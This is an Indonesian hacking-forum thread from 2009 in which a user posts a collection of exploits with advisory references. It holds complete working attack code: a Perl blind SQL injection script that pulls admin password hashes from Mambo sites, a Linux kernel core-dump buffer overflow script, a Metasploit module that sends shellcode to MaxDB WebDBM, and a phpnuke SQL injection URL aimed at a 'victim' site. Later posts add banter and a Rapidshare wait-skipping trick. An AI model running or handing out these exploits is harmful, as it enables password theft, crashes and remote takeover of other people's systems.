Kumpulan Bugs

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:03 pm

Mambo "user_rating" Parameter Remote SQL Injection Exploit

Advisory : FrSIRT/ADV-2005-0777
Rated as : Moderate Risk

Code: Select all

#!/usr/bin/perl
use IO::Socket;

if ( @ARGV < 3) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];

# параметры любой существующей новости
$news_id = 1;
$news_itemid = 1;

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] PATH : $path\r\n";
print " [~] USER ID : $member_id\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
---------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
---------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1
&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/
**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\n
Host: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server);
# пауза между запросами необходимая дабы инфа успела обновиться, поиграйте с
# этим значением если сплоит выдает FAILED
sleep 1;
$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1
HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$server);

while(<$sock2>)
{
if (/1145711457/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
&head;
print q(
USAGE
r57mambo.pl [HOST] [/FOLDER/] [USER_ID]

OPTIONS
HOST - Host where mambo installed
FOLDER - Folder where mambo installed
USER_ID - User ID for brute (default is 62 for admin)
);
exit();
}
sub head()
{
print q(
---------------------------------------------------------------
Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by digital cat
---------------------------------------------------------------
);
}
Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:06 pm

Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow Exploit

Advisory : FrSIRT/ADV-2005-0524
Rated as : Moderate Risk

Code: Select all

Advisory : FrSIRT/ADV-2005-0524
Rated as : Moderate Risk

#!/bin/bash
#
# elfcd.sh
# warning: This code will crash your machine
#
cat <<__EOF__>elfcd1.c
/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>


static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];


void fatal(const char *msg)
{
if(!errno) {
fprintf(stderr, "\nFATAL: %s\n", msg);
}
else {
printf("\n");
perror(msg);
}
fflush(stdout); fflush(stderr);
_exit(129);
}


int main(int ac, char **av)
{
int esp, i, r;
struct rlimit rl;

__asm__("movl %%esp, %0" : : "m"(esp));
printf("\n

    * %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0],

av[ac-1]+strlen(av[ac-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
r = setrlimit(RLIMIT_CORE, &rl);
if(r) fatal("setrlimit");

memset(env, 0, sizeof(env) );
memset(argv, 0, sizeof(argv) );
memset(page, 'A', sizeof(page) );
page[PAGE_SIZE-1]=0;

// move up env & exec phase 2
if(!strcmp(av[0], "AAAA")) {
printf("\n

    * phase 2, <RET> to crash "); fflush(stdout);

argv[0] = "elfcd2";
argv[1] = page;

// term 0 counts!
memset(buf, 0, sizeof(buf) );
for(i=0; i<789 + 4; i++)
buf = 'C';
argv[2] = buf;
execve(argv[0], argv, env);
_exit(127);
}

// move down env & reexec
for(i=0; i<9; i++)
env = page;

argv[0] = "AAAA";
printf("\n

    * phase 1"); fflush(stdout);

execve(av[0], argv, env);

return 0;
}
__EOF__
cat <<__EOF__>elfcd2.c
// phase 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read __NR_read
#define __NR_sys_kill __NR_kill
#define __NR_sys_getpid __NR_getpid


char stack[4096 * 6];
static int errno;


inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);


// yeah, lets do it
void killme()
{
char c='a';
int pid;

pid = sys_getpid();
for(;Wink {
sys_read(0, &c, 1);
sys_kill(pid, 11);
}
}


// safe stack stub
__asm__(
" nop \n"
"_start: movl \$0xbfff6ffc, %esp \n"
" jmp killme \n"
".global _start \n"
);
__EOF__
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
"elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib);
SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
}

PHDRS
{
headers PT_PHDR PHDRS ;
text PT_LOAD FILEHDR PHDRS ;
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
}

SECTIONS
{

.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; }
>rom :fuckme

. = 0xbfff0000 + SIZEOF_HEADERS;
.text : { *(.text) } >ram :text
.data : { *(.data) } >ram :text
.bss :
{
*(.dynbss)
*(.bss)
*(.bss.*)
*(.gnu.linkonce.b.*)
*(COMMON)
. = ALIGN(32 / Cool;
} >ram :text

}
__EOF__

# compile & run
echo -n "

    * Compiling..."

gcc -O2 -Wall elfcd1.c -o elfcd1
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
./elfcd1
Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:08 pm

MySQL MaxDB Webtool "GET" Command Remote Buffer Overflow Exploit
Date : 11/05/2005

Advisory : FrSIRT/ADV-2005-0389
CVE Reference : CAN-2005-0684
Rated as : High Risk

Code: Select all

package Msf::Exploit::maxdb_webdbm_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'MaxDB WebDBM GET Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 9999],
},

'Payload' =>
{
'Space' => 2052,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the MaxDB WebDBM service.
This service is included with many recent versions of the MaxDB and SAPDB
products. This particular module is capable of exploiting Windows systems
through the use of an SEH frame overwrite. The offset to the SEH frame
may change depending on where MaxDB has been installed, this module assumes
a web root path with the same length as:

C:\\Program Files\\sdb\\programs\\web\\Documents
}),

'Refs' =>
[
['URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
],

'DefaultTarget' => 0,
'Targets' =>
[
['MaxDB 7.5.00.11 / 7.5.00.24', 0x1002aa19 ], # wapi.dll
['Windows 2000 English', 0x75022ac4 ], # ws2help.dll
['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll
['Windows 2003 English', 0x7ffc0638 ], # peb magic :-)
['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll
],

'Keys' => ['maxdb'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},  @_);
return($self);
}

sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '

    * Error creating socket: ' . $s->GetError );

return $self->CheckCode('Connect');
}

$s->Send("HEAD / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 5);
$s->Close;

if ($res =~ m/Server:\s*(SAP-Internet-SapDb-Server.*)$/m) {
my $banner = $1;
$banner =~ s/\r//g;

$self->PrintLine("

    * WebDBM detected: $banner");

return $self->CheckCode('Detected');
}

$self->PrintLine("

    * SAP/MaxDB WebDBM server was not detected");

return $self->CheckCode('Safe');
}


sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "

    * Attempting to exploit " . $target->
    * );


my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '

    * Error creating socket: ' . $s->GetError );

return;
}

# Trigger the SEH by writing past the end of the page after
# the SEH is already overwritten. This avoids the other smashed
# pointer exceptions and goes straight to the payload.
my $path = Pex::Text::AlphaNumText(16384);

substr($path, 1586, length($shellcode), $shellcode);
substr($path, 3638, 5, "\xe9" . pack('V', -2052));
substr($path, 3643, 2, "\xeb\xf9");
substr($path, 3647, 4, pack('V', $target->[1]));

$s->Send("GET /%$path HTTP/1.0\r\n\r\n");
$s->Recv(-1, 5);
return;
}

1;
Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Fri Jul 24, 2009 7:12 pm

Bug : SQL phpnuke 7.0

Kode by : [email protected]

Code: Select all

&#1059;&#1103;&#1079;&#1074;&#1080;&#1084;&#1086;&#1089;&#1090;&#1100; &#1085;&#1072;&#1081;&#1076;&#1077;&#1085;&#1072; &#1074; &#1084;&#1086;&#1076;&#1091;&#1083;&#1077; Survey. &#1059;&#1076;&#1072;&#1083;&#1077;&#1085;&#1085;&#1099;&#1081; &#1072;&#1090;&#1072;&#1082;&#1091;&#1102;&#1097;&#1080;&#1081; &#1084;&#1086;&#1078;&#1077;&#1090; &#1074;&#1085;&#1077;&#1076;&#1088;&#1080;&#1090;&#1100; &#1087;&#1088;&#1086;&#1080;&#1079;&#1074;&#1086;&#1083;&#1100;&#1085;&#1099;&#1081; 
sql-&#1082;&#1086;&#1076; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1091;&#1103; &#1086;&#1090;&#1089;&#1091;&#1090;&#1089;&#1090;&#1074;&#1080;&#1077; &#1092;&#1080;&#1083;&#1100;&#1090;&#1088;&#1072;&#1094;&#1080;&#1080; &#1087;&#1077;&#1088;&#1077;&#1084;&#1077;&#1085;&#1085;&#1086;&#1081; pollID.
&#1044;&#1072;&#1085;&#1085;&#1072;&#1103; &#1091;&#1103;&#1079;&#1074;&#1080;&#1084;&#1086;&#1089;&#1090;&#1100; &#1084;&#1086;&#1078;&#1077;&#1090; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;&#1089;&#1103; &#1076;&#1083;&#1103; &#1087;&#1086;&#1083;&#1091;&#1095;&#1077;&#1085;&#1080;&#1103; &#1093;&#1077;&#1096;&#1077;&#1081; &#1087;&#1072;&#1088;&#1086;&#1083;&#1077;&#1081; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1077;&#1081; &#1087;&#1086;&#1088;&#1090;&#1072;&#1083;&#1072;. 
o-------------------------=[ Contoh ]:::
www.victim.com/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here]
Terima Kasih.......

Image

Image

Image

Image

User avatar
pLaybOy
Posts: 26
Joined: Sun Dec 30, 2007 12:24 am

Re: Kumpulan Bugs

Post by pLaybOy » Sat Jul 25, 2009 4:17 am

mantap euy yg cia ngga brani buka ah, ntr di kira gw pula yg ngehack :lol:

d1kz
Posts: 107
Joined: Fri Jul 24, 2009 3:50 pm
Location: B4t4v14
Contact:

Re: Kumpulan Bugs

Post by d1kz » Sat Jul 25, 2009 2:25 pm

gokil banyak juga ya :D :D :D
::. Ikuti slalu kata hati .::

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Sat Jul 25, 2009 3:15 pm

pLaybOy wrote:mantap euy yg cia ngga brani buka ah, ntr di kira gw pula yg ngehack :lol:
kenapa kamu tidak berani buka..?

buka / lihat saja lagi..

apa kamu mau lihat nama kamu di CIA ?

becanda aja kok...

Terima Kasih.......

Image

Image

Image

Image

User avatar
Digital Cat
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA
Contact:

Re: Kumpulan Bugs

Post by Digital Cat » Mon Nov 16, 2009 2:09 pm

Bagi yang sering download dengan Rapidshare pasti busen kalo harus tunggu giliran download,

gunain aja kode ini simpan dengan format bat :

Code: Select all

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


java scriptnya seperti ini :

Code: Select all

c(countdown = 0);
sorry coy kalo udah ada yang tau.. key..

thanks..

User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: Kumpulan Bugs

Post by shad.hckr » Mon Nov 16, 2009 6:02 pm

bug cia nya dah gak bisa kek nya tuh kk.. tapi keren dah postingannya.. Te O Pe Be Ge Te eS Ka eL..

Post Reply

Return to “Web Hacking”